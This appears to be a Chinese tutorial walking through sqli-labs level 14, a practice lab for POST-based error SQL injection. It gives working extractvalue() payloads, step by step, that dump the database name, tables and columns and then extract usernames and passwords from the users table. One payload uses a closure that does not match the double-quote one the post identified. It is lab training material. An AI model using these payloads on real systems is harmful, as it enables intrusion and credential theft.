sqli-labs第十四关——“POST报错注入

一:判断注入类型

和上一关一样,输入如下代码,回显报错,其余类型无回显

复制代码
uname=1"&passwd=123

判断为双引号字符型,尝试闭合

判断正确,成功登录

二:开始攻击

1.爆数据库名

复制代码
uname=1" and extractvalue(1,concat(0x7e,(select database())))#&passwd=123

2. 爆表名

复制代码
uname=1" and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())))#&passwd=123

3.爆列名

复制代码
uname=1') and extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name='users')))#&passwd=123

4.爆数据

判断数据量

复制代码
uname=1" and extractvalue(1,concat(0x7e,(select count(*) from users)))#&passwd=123

分两段爆数据

复制代码
uname=1" and extractvalue(1,concat(0x7e, substring((select group_concat(username,0x3a,password) from users),1,32)))#&passwd=123
uname=1" and extractvalue(1,concat(0x7e, substring((select group_concat(username,0x3a,password) from users),32,32)))#&passwd=123

❀❀❀ 完结撒花!! ❀❀❀

相关推荐
学编程的小程18 分钟前
突破局域网限制:MongoDB远程管理新体验
数据库·mongodb
鸿乃江边鸟22 分钟前
向量化和列式存储
大数据·sql·向量化
波波烤鸭27 分钟前
Redis 高可用实战源码解析(Sentinel + Cluster 整合应用)
数据库·redis·sentinel
l1t4 小时前
利用DeepSeek实现服务器客户端模式的DuckDB原型
服务器·c语言·数据库·人工智能·postgresql·协议·duckdb
MarkHard1238 小时前
如何利用redis使用一个滑动窗口限流
数据库·redis·缓存
island131410 小时前
【Redis#10】渐进式遍历 | 数据库管理 | redis_cli | RES
数据库·redis·bootstrap
心想事成的幸运大王10 小时前
Redis的过期策略
数据库·redis·缓存
倔强的石头_10 小时前
CentOS 上安装KingbaseES(ISO包)详细教程
数据库
2401_8979300611 小时前
使用Docker轻松部署Neo4j图数据库
数据库·docker·neo4j
诗句藏于尽头11 小时前
Django模型与数据库表映射的两种方式
数据库·python·django